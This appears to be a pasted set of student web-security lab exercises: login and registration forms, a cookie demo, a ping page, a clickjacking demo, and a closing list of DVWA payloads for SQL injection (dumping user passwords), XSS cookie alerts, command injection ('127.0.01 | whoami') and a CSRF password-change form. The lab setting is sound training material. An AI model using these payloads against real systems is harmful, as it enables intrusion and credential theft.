war99859

Untitled

Oct 29th, 2023 (edited)
HTML 10.15 KB | None | 0 0
  1. Experiments:
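  <!doctype html>
  <html lang="en">
  <head>
    <meta charset="utf-8">
    <title>Login</title>
    <script src="https://www.google.com/recaptcha/api.js" async defer></script>
  </head>
  <body>
    <!-- method="post": without it the form defaults to GET and the password
         ends up in the URL, where browser history, proxies and server access
         logs record it. -->
    <form action="submit.php" method="post">
      <label for="u">Username</label>
      <input type="text" id="u" name="u" placeholder="Username" autocomplete="username" required>
      <label for="p">Password</label>
      <input type="password" id="p" name="p" placeholder="Password" autocomplete="current-password" required>
      <!-- Hidden fields are visible to and editable by the client; the server
           must treat h1 as untrusted input like any other field. -->
      <input type="hidden" name="h1" value="v1">
      <!-- YOUR_KEY is the public site key. The widget protects nothing unless
           submit.php verifies the posted g-recaptcha-response on the server. -->
      <div class="g-recaptcha" data-sitekey="YOUR_KEY"></div>
      <input type="submit">
    </form>
  </body>
  </html>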
  17.  
  18. Exp_1:
  19. Index.html:
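  <!doctype html>
  <html lang="en">
  <head>
    <meta charset="utf-8">
    <title>Exp_1</title>
    <style>
      /* Replaces the deprecated <center> element. */
      body { text-align: center; }
      .g-recaptcha { display: inline-block; }
    </style>
  </head>
  <body>
    <h1>Amrita Cyber Nation</h1>
    <form action="process-login.php" method="post">
      <!-- A control without a name attribute is never submitted, so the
           original username and password inputs sent nothing to the server. -->
      <label for="username">Username:</label>
      <input type="text" id="username" name="username" autocomplete="username" required><br><br>

      <!-- Hidden fields can be read and changed by the client; validate
           registration_type on the server. -->
      <input type="hidden" name="registration_type" value="Hidden">
      <label for="password">Password:</label>
      <input type="password" id="password" name="password" autocomplete="current-password" required><br><br>
      <!-- The site key is public by design; only the secret key used by the
           server-side verification must stay private. -->
      <div class="g-recaptcha"
           data-sitekey="6Lfdq9ooAAAAAPnQmjE95iUwPlUcCIbgnfW_P81x"></div><br>
      <input type="submit" value="Login">
    </form>
    <!-- reCAPTCHA script -->
    <script src="https://www.google.com/recaptcha/api.js" async defer></script>
  </body>
  </html>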
  44.  
  45. Process-login.php:
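  <?php
  // Verifies the reCAPTCHA token posted by the login form and reports the result.
  // NOTE(review): only the captcha is checked here; nothing in this script
  // validates a username or password before printing "Login successful!".

  // The reCAPTCHA secret must not live in source code. It is read from the
  // environment; a secret that has been committed or published has to be
  // regenerated in the reCAPTCHA admin console.
  $secretKey = getenv('RECAPTCHA_SECRET_KEY');
  if ($secretKey === false || $secretKey === '') {
      // Fail closed when the server is not configured.
      http_response_code(500);
      exit("Captcha verification failed.");
  }

  $token = isset($_POST['g-recaptcha-response']) ? $_POST['g-recaptcha-response'] : '';
  if (!is_string($token) || $token === '') {
      exit("Captcha verification failed.");
  }

  // Send secret and token in a POST body: both are URL-encoded by
  // http_build_query, and the secret stays out of the request URL (and
  // therefore out of proxy and access logs).
  $context = stream_context_create([
      'http' => [
          'method'  => 'POST',
          'header'  => "Content-Type: application/x-www-form-urlencoded\r\n",
          'content' => http_build_query(['secret' => $secretKey, 'response' => $token]),
          'timeout' => 5,
      ],
  ]);
  $response = file_get_contents('https://www.google.com/recaptcha/api/siteverify', false, $context);

  // A network failure or malformed reply counts as "not verified".
  $result = ($response === false) ? null : json_decode($response, true);
  $isVerified = is_array($result) && isset($result['success']) && $result['success'] === true;

  echo $isVerified ? "Login successful!" : "Please complete the captcha verification.";
  ?>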
  56.  
  57. Exp_2:
  58.  
  59. index.html:
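  <!doctype html>
  <html lang="en">
  <head>
    <meta charset="utf-8">
    <title>Registration</title>
  </head>
  <body>
    <h1>Amrita Cyber Nation Registration</h1>
    <!-- method="post": a form without a method submits with GET, which puts
         the password into the URL, browser history and server logs. -->
    <!-- autocomplete="off" only asks the browser not to offer stored values.
         Password managers commonly ignore it on password fields, so it is a
         usability hint and not a security control. -->
    <form method="post" autocomplete="off">
      <label for="username">Username</label>
      <input type="text" id="username" name="username" placeholder="Username" autocomplete="off"><br>
      <label for="email">Email</label>
      <input type="email" id="email" name="email" placeholder="Email" autocomplete="off"><br>
      <label for="password">Password</label>
      <input type="password" id="password" name="password" placeholder="Password" autocomplete="off"><br>
      <input type="submit" value="Register">
    </form>
  </body>
  </html>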
  75.  
  76. Exp_3:
  77. Index.html:
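  <!doctype html>
  <html lang="en">
  <head>
    <meta charset="utf-8">
    <title>exp_3_Bank Login</title>
  </head>
  <body>
    <h1>Bank Login</h1>
    <!-- NOTE(review): the values typed here are never submitted or checked;
         the button only opens the popup. Authentication has to happen on the
         server before bank-portal.html is served. -->
    <form id="bankLoginForm">
      <label for="bankUser">Username</label>
      <input type="text" id="bankUser" placeholder="Username" autocomplete="username"><br>
      <label for="bankPass">Password</label>
      <input type="password" id="bankPass" placeholder="Password" autocomplete="current-password"><br>
      <input type="button" id="bankLoginButton" value="Login">
    </form>

    <script>
      // Opens the portal in a 600x400 popup window named "BankPortal".
      // Current mainstream browsers keep showing the popup's URL even when
      // location=no is requested, so users can still check which site they
      // are on.
      function openBankPortal() {
        window.open(
          'bank-portal.html',
          'BankPortal',
          'width=600,height=400,location=no,menubar=no,status=no,toolbar=no'
        );
      }

      // Bound here instead of an inline onclick attribute so the page can run
      // under a Content-Security-Policy that forbids inline event handlers.
      document.getElementById('bankLoginButton').addEventListener('click', openBankPortal);
    </script>
  </body>
  </html>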
  97.  
  98. Bank-portal.html:
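  <!doctype html>
  <html lang="en">
  <head>
    <meta charset="utf-8">
    <title>Bank Portal</title>
  </head>
  <body>
    <!-- NOTE(review): this is a static page; nothing in this file checks that
         the visitor is logged in, so anyone who knows the URL can load it.
         Access control must be enforced by the server that serves it. -->
    <div class="container">
      <h2>Welcome to the Bank Portal</h2>
      <p>Your current balance is: $10,000</p>
    </div>
  </body>
  </html>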
  109.  
  110.  
  111. Exp_4:
  112. index.html
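  <!doctype html>
  <html lang="en">
  <head>
    <meta charset="utf-8">
    <title>Exp_4</title>
    <style>
      /* Replaces the deprecated <center> element. */
      body { text-align: center; }
    </style>
    <script>
      // Cancels the triggering event (copy, paste or context menu) and tells
      // the user why. This is a deterrent only: it runs in the user's browser
      // and stops working when scripts are disabled or the request is sent
      // without the page, so the server must still validate every field.
      function preventActions(e) {
        e.preventDefault();
        alert('Copy, Paste, and Right Click are not allowed.');
      }
    </script>
  </head>

  <body oncontextmenu="preventActions(event)">
    <h1>Bank Tranfer</h1>
    <!-- method="post": a transfer changes state and must not travel as a GET
         query string. -->
    <form method="post">
      <!-- Each label's for attribute needs a matching id on its input; the
           name attribute is what makes the value part of the submission. -->
      <label for="fromAccount">From Account:</label>
      <input type="text" id="fromAccount" name="fromAccount" oncopy="preventActions(event)" onpaste="preventActions(event)"><br><br>
      <label for="toAccount">To Account:</label>
      <input type="text" id="toAccount" name="toAccount" oncopy="preventActions(event)" onpaste="preventActions(event)"><br><br>
      <label for="amount">Amount:</label>
      <input type="text" id="amount" name="amount" oncopy="preventActions(event)" onpaste="preventActions(event)"><br><br>
      <input type="submit" value="Transfer">
    </form>
  </body>
  </html>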
  138.  
  139. Exp_5:
  140. Index.html:
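  <!doctype html>
  <html lang="en">
  <head>
    <meta charset="utf-8">
    <title>Country Validation</title>
    <script>
      // Compares the country selected in the form with the country that the
      // reverse-geocoding service reports for the browser's position.
      //
      // The check runs entirely in the browser and the position is supplied
      // by the client, so the result can be altered by the user; it must not
      // be used as an access-control decision. The coordinates are also sent
      // to a third-party service, which is a privacy consideration.
      function validateLocation() {
        navigator.geolocation.getCurrentPosition(
          position => {
            // URLSearchParams encodes both values for the query string.
            const query = new URLSearchParams({
              latitude: position.coords.latitude,
              longitude: position.coords.longitude
            });
            fetch(`https://api.bigdatacloud.net/data/reverse-geocode-client?${query}`)
              .then(res => res.json())
              .then(data => alert(
                data.countryName === document.getElementById('country').value ? 'Success' : 'Incorrect'
              ))
              // Network or parse failure: report as not verified.
              .catch(() => alert('Incorrect'));
          },
          // Permission denied or position unavailable: report as not verified.
          () => alert('Incorrect')
        );
      }
    </script>
  </head>

  <body>
    <h1>Country Validation</h1>
    <form onsubmit="event.preventDefault(); validateLocation();">
      <label for="country">Country:</label>
      <select id="country">
        <option value="India">India</option>
        <option value="USA">USA</option>
        <option value="Japan">Japan</option>
      </select>
      <input type="submit" value="Verify">
    </form>
  </body>
  </html>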
  166.  
  167. Exp_6:
  168. Index.html:
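  <!doctype html>
  <html lang="en">
  <head>
      <meta charset="utf-8">
      <title>Banking Sign-In</title>
  </head>
  <body>
      <form method="POST" action="">
          <label for="username">Username</label><br>
          <input type="text" name="username" id="username"><br>
          <label for="email">Email</label><br>
          <input type="email" name="email" id="email"><br>
          <button type="submit">Register</button>
      </form>

      <?php
      // Echoes the submitted values back to the user for verification.
      if ($_SERVER["REQUEST_METHOD"] == "POST") {
          echo "<h2>VERIFICATION PURPOSE</h2>";
          // Missing or non-string (array) parameters are treated as empty.
          $username = (isset($_POST['username']) && is_string($_POST['username'])) ? $_POST['username'] : '';
          $email = (isset($_POST['email']) && is_string($_POST['email'])) ? $_POST['email'] : '';
          // Request data is untrusted: escape it for the HTML context before
          // output so submitted markup is shown as text instead of being
          // interpreted by the browser (reflected XSS).
          echo "Username: " . htmlspecialchars($username, ENT_QUOTES, 'UTF-8') . " <br>";
          echo "Email: " . htmlspecialchars($email, ENT_QUOTES, 'UTF-8');
      }
      ?>
  </body>
  </html>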
  194.  
  195.  
  196. Exp_7:
  197.  
  198. Exp_8:
  199. Index.html:
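  <!doctype html>
  <html lang="en">
  <head>
    <meta charset="utf-8">
    <title>Display Student Marks</title>
    <script>
      // Loads students.xml and shows the marks of the student selected in
      // the #students list inside #output.
      function fetchMarks() {
        const name = document.getElementById('students').value;
        const output = document.getElementById('output');
        const xhttp = new XMLHttpRequest();

        xhttp.onload = function () {
          // responseXML is null when the reply is not well-formed XML.
          const doc = this.responseXML;
          if (!doc) {
            return;
          }

          const student = Array.from(doc.querySelectorAll('student')).find(s => {
            const nameNode = s.querySelector('name');
            return nameNode !== null && nameNode.textContent === name;
          });
          if (!student) {
            return;
          }

          // A missing element yields an empty string instead of throwing.
          const mark = tag => {
            const node = student.querySelector(tag);
            return node ? node.textContent : '';
          };

          // Values from the XML file are inserted as text nodes, not through
          // innerHTML, so markup inside the data cannot run in the page.
          output.textContent = '';
          output.append(
            `Maths: ${mark('maths')}`, document.createElement('br'),
            `Science: ${mark('science')}`, document.createElement('br'),
            `History: ${mark('history')}`
          );
        };

        xhttp.open("GET", "students.xml");
        xhttp.send();
      }
    </script>
  </head>

  <body>
    <h1>Display Student Marks</h1>
    <label for="students">Student</label>
    <select id="students">
      <option>John Doe</option>
      <option>Jane Smith</option>
    </select>

    <button type="button" onclick="fetchMarks()">Display Marks</button>
    <div id="output"></div>
  </body>
  </html>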
  230.  
  231. Students.xml:
  232. <?xml version="1.0" encoding="UTF-8"?>
  233. <students>
  234. <student>
  235. <name>John Doe</name>
  236. <maths>85</maths>
  237. <science>88</science>
  238. <history>90</history>
  239. </student>
  240. <student>
  241. <name>Jane Smith</name>
  242. <maths>78</maths>
  243. <science>82</science>
  244. <history>86</history>
  245. </student>
  246. </students>
  247.  
  248. Exp_9: Index.html:
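  <!doctype html>
  <html lang="en">
  <head>
    <meta charset="utf-8">
    <title>Fetch From Json</title>
    <script>
      // Fetches students.json and shows its name, age and grade fields in
      // #studentDetails.
      function displayDetails() {
        const target = document.getElementById('studentDetails');
        fetch('students.json')
          .then(response => {
            if (!response.ok) {
              throw new Error(`HTTP ${response.status}`);
            }
            return response.json();
          })
          .then(data => {
            // Values from the JSON file are inserted as text nodes, not
            // through innerHTML, so markup inside the data cannot run in
            // the page.
            target.textContent = '';
            target.append(
              `Name: ${data.name}`, document.createElement('br'),
              ` Age: ${data.age}`, document.createElement('br'),
              ` Grade: ${data.grade}`
            );
          })
          // A failed request or invalid JSON leaves the page unchanged.
          .catch(error => console.error('Could not load students.json', error));
      }
    </script>
  </head>
  <body>
    <h1>Fetch From Json</h1><br>
    <button type="button" onclick="displayDetails()">Display Student Details</button><br><br>
    <div id="studentDetails"></div>

  </body>
  </html>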
  270.  
  271. Students.json:
  272. {
  273. "name": "John Doe", "age": 21,
  274. "grade": "B"
  275. }
  276.  
  277. Exp_10:
  278. Cookie.php
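  <?php
  // Demonstrates setting, reading, modifying and deleting the "user" cookie.
  // The operation is chosen by the "action" query parameter.
  //
  // NOTE(review): set/modify/delete change state on a GET request, so any
  // page can trigger them through a link. That is acceptable for a demo but
  // not for real session data, which also needs a SameSite attribute (the
  // options-array form of setcookie, PHP 7.3+).

  // Mark the cookie Secure only when the request arrived over HTTPS, so the
  // demo keeps working on a plain-HTTP lab server.
  $isHttps = !empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off';

  if (isset($_GET['action'])) {
      switch ($_GET['action']) {
          case 'set':
              // Final argument true = HttpOnly: page scripts cannot read it.
              setcookie("user", "John Doe", time() + 3600, "", "", $isHttps, true);
              echo "Cookie set!<br>";
              break;

          case 'get':
              // Cookies are sent by the client and can hold any bytes, so
              // the value is escaped before it is written into the page.
              echo (isset($_COOKIE["user"]) && is_string($_COOKIE["user"]))
                  ? "Cookie: " . htmlspecialchars($_COOKIE["user"], ENT_QUOTES, 'UTF-8') . "<br>"
                  : "Cookie not set.<br>";
              break;

          case 'modify':
              setcookie("user", "Jane Smith", time() + 3600, "", "", $isHttps, true);
              echo "Cookie modified!<br>";
              break;

          case 'delete':
              // An expiry in the past tells the browser to drop the cookie;
              // path and domain must match the ones used when it was set.
              setcookie("user", "", time() - 3600, "", "", $isHttps, true);
              echo "Cookie deleted!<br>";
              break;
      }
  }
  ?>
  <h1>working with cookies</h1>
  <a href="?action=set">Set Cookie</a> |
  <a href="?action=get">Get Cookie</a> |
  <a href="?action=modify">Modify Cookie</a> |
  <a href="?action=delete">Delete Cookie</a>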
  302.  
  303. Exp_14:
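  <?php
  // Pings the address given in the "ip" query parameter and prints the
  // command output.
  if (isset($_GET['ip'])) {
      $ip = is_string($_GET['ip']) ? trim($_GET['ip']) : '';

      // The parameter is untrusted. Accept only a literal IPv4/IPv6 address,
      // and still quote it for the shell, so nothing but an address can
      // reach the command line.
      if (filter_var($ip, FILTER_VALIDATE_IP) !== false) {
          // NOTE(review): no count or timeout option is passed; on platforms
          // where ping runs until interrupted this ties up the request.
          // Confirm the target OS and add the matching option.
          system("ping " . escapeshellarg($ip));
      } else {
          echo "Invalid IP address.";
      }
  }
  ?>

  <form method="GET">
  Enter the IP to perform ping: <input type="text" name="ip">
  <input type="submit" value="View File">
  </form>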
  314.  
  315. Exp_15: Index.html
  <html>
  <head>
  <style>
  /* Lab demo of UI redressing: target.html is framed almost transparently
     and stacked above the visible button. The defence belongs on the framed
     page, which should refuse to be embedded (frame-ancestors in its
     Content-Security-Policy, or X-Frame-Options). */
  body {
    position: relative;
    height: 100vh;
    display: flex;
    align-items: center;
    justify-content: center;
  }

  iframe {
    z-index: 2;
    opacity: 0.1; /* Makes the iframe barely visible */
    position: absolute;
    left: 50%;
    top: 50%;
    transform: translate(-50%, -50%);
  }

  button {
    z-index: 1;
    padding: 15px 30px;
    font-size: 24px;
  }
  </style>
  </head>
  <body>
  <iframe src="target.html" width="200" height="100"></iframe>
  <button>Close the advertisement</button>
  </body>
  </html>
  340.  
  341. Target.html:
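  <!doctype html>
  <html lang="en">
  <head>
    <meta charset="utf-8">
    <title>Target Page</title>
    <!-- As written, this page can be embedded in a frame by any origin.
         Framing is controlled by response headers, not by markup: serve the
         page with "Content-Security-Policy: frame-ancestors 'none'" (or
         'self') and, for older browsers, "X-Frame-Options: DENY". A
         frame-ancestors directive placed in a meta tag is ignored. -->
    <style>
      body {
        display: flex;
        justify-content: center;
        align-items: center;
        height: 100vh;
      }
      button {
        font-size: 24px;
        padding: 15px 30px;
      }
    </style>
  </head>
  <body>
    <button type="button" id="actionButton">HACK</button>
    <script>
      // Bound here instead of an inline onclick attribute so the page can be
      // served with a Content-Security-Policy that forbids inline handlers.
      document.getElementById('actionButton').addEventListener('click', function () {
        alert('Data compromised');
      });
    </script>
  </body>
  </html>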
  361.  
  362.  
  363. 11. SQL
  364. a. Always True Scenario -
  365. %' or '1'='1
  366.  
  367. b. Display Database Version, User, Name -
  368. %' or 0=0 union select null, version() #
  369. %' or 0=0 union select null, user() #
  370. %' or 0=0 union select null, database() #
  371.  
  372. c. Display all the table field -
  373. 'union select null,table_name from information_schema.tables#
  374.  
  375. d. Display all the column's field -
  376.  'union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
  377.  
  378.  
  379. 12. XSS
  380. a. Reflected XSS
  381. <script>alert(document.cookie)</script>
  382. <Script>alert(document.cookie)</Script>
  383. <img src = x onerror =alert(document.cookie)>
  384.  
  385. b. Stored XSS
  386. <script>alert(document.cookie)</script>
  387. <Script>alert(document.cookie)</Script>
  388. <svg/onload=alert("hackersid")>
  389.  
  390. c. DOM-based XSS
  391. <script>alert(document.cookie)</script>
  392. </select><img src=x onerror=alert('XSS')>
  393. & </select> <Svg onload=alert("hi")>
  394.  
  395. reflected xss
  396. low
  397. <script> alert("1567")</script>
  398. medium
  399. <Script> alert("1567")</Script>
  400. high
  401. <img src=x onerror=alert("12345")>
  402.  
  403. stored xss
  404. low
  405. <script> alert("1567")</script>
  406. medium
  407. <Script> alert("1567")</Script>
  408. high
  409. <svg/onload=alert("hackersid")>
  410.  
  411.  
  412. 14. Command Injection
  413. 127.0.01 | tasklist
  414. 127.0.01 | wmic bios
  415. 127.0.01 | whoami
  416.  
  417.  
  418. 13. CSRF
  419. <form action="http://localhost:8080/dvwa/vulnerabilities/csrf/?" method="GET">
  420.             <h1> Click here to get 100Rs </h1>
  421.             <input type="hidden" AUTOCOMPLETE="off" name="password_new" value="7814">
  422.             <input type="hidden" AUTOCOMPLETE="off" name="password_conf" value="7814">
  423.             <input type="submit" value="Submit" name="Change">
  424.         </form>
  425.  